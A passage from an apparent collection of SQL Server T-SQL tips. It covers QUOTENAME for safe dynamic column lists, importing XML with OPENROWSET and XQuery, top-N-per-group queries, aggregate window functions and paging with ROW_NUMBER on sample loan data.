*/

This query can be further improved by using the QUOTENAME function to prevent any possibility of SQL injection.
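For example, the column list can be built with QUOTENAME (a sketch against the same Orders table); QUOTENAME wraps each value in brackets and escapes embedded delimiters, so the manual '],[' separators and the trailing N']' are no longer needed:

DECLARE @cols NVARCHAR(1000);

SELECT @cols =
STUFF((SELECT N',' + QUOTENAME(year_month)
       FROM (SELECT DISTINCT CONVERT(NCHAR(7), order_date, 126)
             FROM Orders) AS O(year_month)
       ORDER BY year_month
       FOR XML PATH('')
      ), 1, 1, '');  -- strip the leading comma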

Import XML File to SQL Table

Here is a brief example of importing an XML file into a SQL Server table. This is accomplished by using the BULK option of OPENROWSET to load the file, and then utilizing the XQuery capabilities of SQL Server to parse the XML into normalized table format. This example requires SQL Server 2005 or SQL Server 2008.

First, the following XML is saved to the file C:\Products.xml.

<Products>

  <Product>

    <SKU>1</SKU>

    <Desc>Book</Desc>

  </Product>

  <Product>

    <SKU>2</SKU>

    <Desc>DVD</Desc>

  </Product>

  <Product>

    <SKU>3</SKU>

    <Desc>Video</Desc>

  </Product>

</Products>

Next, a table named Products is created to store the XML data.

CREATE TABLE Products(

 sku INT PRIMARY KEY,

 product_desc VARCHAR(30));

Finally, the following statement will load the XML file, parse the XML elements to columns, and insert into the Products table:

INSERT INTO Products (sku, product_desc)

SELECT X.product.query('SKU').value('.', 'INT'),

       X.product.query('Desc').value('.', 'VARCHAR(30)')

FROM (

SELECT CAST(x AS XML)

FROM OPENROWSET(

    BULK 'C:\Products.xml',

    SINGLE_BLOB) AS T(x)

    ) AS T(x)

CROSS APPLY x.nodes('Products/Product') AS X(product);

Here are the results:

SELECT sku, product_desc

FROM Products;

 

/*

 

Results:

 

sku         product_desc

----------- -------------

1           Book

2           DVD

3           Video

 

*/

Top N by Group

It is a very common request to select the top N items per group. Examples are the top 2 sales agents per region, the last two orders per customer, etc. There are various techniques to accomplish this. On SQL Server 2005 and 2008 this normally involves CROSS APPLY, TOP, and the ranking functions.

Here are a couple of examples of solving this problem utilizing the ranking functions in SQL Server 2005/2008. These methods are simple and efficient, while also providing flexibility in handling ties. A CROSS APPLY alternative is sketched after the ranking examples.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P', -- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Top 3 loans by loan type (no ties)

SELECT loan_nbr, loan_type, loan_amount, rk

FROM (SELECT loan_nbr, loan_type, loan_amount,

            ROW_NUMBER() OVER(PARTITION BY loan_type

                               ORDER BY loan_amount DESC) AS rk

      FROM Loans) AS L

WHERE rk <= 3;

 

-- Top 3 loans by loan type (with ties)

SELECT loan_nbr, loan_type, loan_amount, rk

FROM (SELECT loan_nbr, loan_type, loan_amount,

            DENSE_RANK() OVER(PARTITION BY loan_type

                               ORDER BY loan_amount DESC) AS rk

      FROM Loans) AS L

WHERE rk <= 3;

 

-- Latest loan for each customer

SELECT customer_nbr, loan_nbr, loan_type, loan_amount, loan_date

FROM (SELECT loan_nbr, loan_type, loan_amount,

            customer_nbr, loan_date,

            ROW_NUMBER() OVER(PARTITION BY customer_nbr

                               ORDER BY loan_date DESC) AS rk

      FROM Loans) AS L

WHERE rk = 1;
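As mentioned above, CROSS APPLY with TOP is another common way to solve this. Here is a minimal sketch against the same Loans table (top 3 loans per loan type, no ties):

-- For each distinct loan type, apply a correlated TOP (3) query
SELECT L.loan_nbr, L.loan_type, L.loan_amount
FROM (SELECT DISTINCT loan_type FROM Loans) AS T
CROSS APPLY (SELECT TOP (3) loan_nbr, loan_type, loan_amount
             FROM Loans
             WHERE loan_type = T.loan_type
             ORDER BY loan_amount DESC) AS L;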

Aggregate Window Functions

The addition of the OVER clause in SQL Server was a great enhancement to the T-SQL language. Using the ranking functions has helped solve an array of problems in a very efficient manner. While the ranking functions get most of the attention, it is often overlooked that the OVER clause now also supports aggregate window functions. This means that a window aggregate function (SUM, AVG, COUNT, MIN, MAX) computes a value for each row from the result set defined by the window (partition). That opens an opportunity to solve problems using new methods.

Here are a couple of examples demonstrating aggregate window functions with the OVER clause.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P', -- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Aggregate window functions with the OVER clause

SELECT loan_nbr, loan_type, loan_amount, customer_nbr,

       SUM(loan_amount) OVER(PARTITION BY customer_nbr) AS total_customer_loans,

       AVG(loan_amount) OVER(PARTITION BY customer_nbr) AS avg_customer_loan_amt,

       MAX(loan_amount) OVER(PARTITION BY customer_nbr) AS max_customer_loan_amt,

       MIN(loan_amount) OVER(PARTITION BY customer_nbr) AS min_customer_loan_amt,

       COUNT(*) OVER(PARTITION BY customer_nbr) AS count_customer_loans

FROM Loans;

 

-- Calculate percent for current loan based on total customer loans

-- and total of all loans

SELECT loan_nbr, loan_type, loan_amount, customer_nbr,

       loan_amount /

       SUM(loan_amount) OVER(PARTITION BY customer_nbr) AS percent_of_customer_loans,

       loan_amount /

       SUM(loan_amount) OVER() AS percent_of_all_loans

FROM Loans;

 

-- Get customers (and all their loans) with 2 or more loans

SELECT customer_nbr, loan_nbr, loan_amount, cnt

FROM (SELECT customer_nbr, loan_nbr, loan_amount,

            COUNT(*) OVER(PARTITION BY customer_nbr) AS cnt

      FROM Loans) AS L

WHERE cnt >= 2;
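As a usage note on the percentage query above, multiplying by 100.0 and casting produces a friendlier output (the precision chosen here is just an illustration):

SELECT loan_nbr, loan_type, loan_amount, customer_nbr,
       CAST(100.0 * loan_amount /
            SUM(loan_amount) OVER(PARTITION BY customer_nbr) AS DECIMAL(5, 2)) AS pct_of_customer_loans,
       CAST(100.0 * loan_amount /
            SUM(loan_amount) OVER() AS DECIMAL(5, 2)) AS pct_of_all_loans
FROM Loans;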

Resources:

OVER Clause
http://msdn.microsoft.com/en-us/library/ms189461.aspx

Paging with Ranking Functions

Paging through result sets is a very common need in applications. It provides a convenient way to deliver small chunks of data to the client application, minimizing network traffic and allowing end users to browse the data page by page.

There are different methods to accomplish paging, both on the client and the server side. The introduction of the ranking functions in SQL Server 2005 (and SQL Server 2008) provides another efficient tool for implementing paging.

The following example demonstrates paging utilizing the ROW_NUMBER function. It generates a sequence number for each row, ordered by the loan date column, and the sequence is then used to split the result set into pages.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P', -- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Paging

DECLARE @page_size INT = 5;

DECLARE @page_nbr  INT = 4;

 

WITH LoansRanked (loan_date, loan_amount, loan_type, seq)

AS

(SELECT loan_date, loan_amount, loan_type,

        ROW_NUMBER() OVER (ORDER BY loan_date, loan_nbr)

FROM Loans)

SELECT loan_date, loan_amount, loan_type, seq

FROM LoansRanked

WHERE seq > (@page_nbr - 1) * @page_size

  AND seq <= @page_nbr * @page_size;

 

/*

 

Results (4th page which contains only 3 rows):

 

loan_date               loan_amount   loan_type seq

----------------------- ------------- --------- ----

2008-08-16 00:00:00.000     2500.00 P         16

2008-08-17 00:00:00.000     10000.00 B         17

2008-08-20 00:00:00.000     6000.00 P         18

 

*/
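A possible extension of the paging query (a sketch, not part of the original example) is to return the total row count alongside each page using COUNT(*) OVER(), so the client can compute the number of pages; it assumes the same @page_size and @page_nbr variables declared above:

WITH LoansRanked (loan_date, loan_amount, loan_type, seq, total_rows)
AS
(SELECT loan_date, loan_amount, loan_type,
        ROW_NUMBER() OVER (ORDER BY loan_date, loan_nbr),
        COUNT(*) OVER ()   -- total number of rows across all pages
 FROM Loans)
SELECT loan_date, loan_amount, loan_type, seq, total_rows
FROM LoansRanked
WHERE seq > (@page_nbr - 1) * @page_size
  AND seq <= @page_nbr * @page_size;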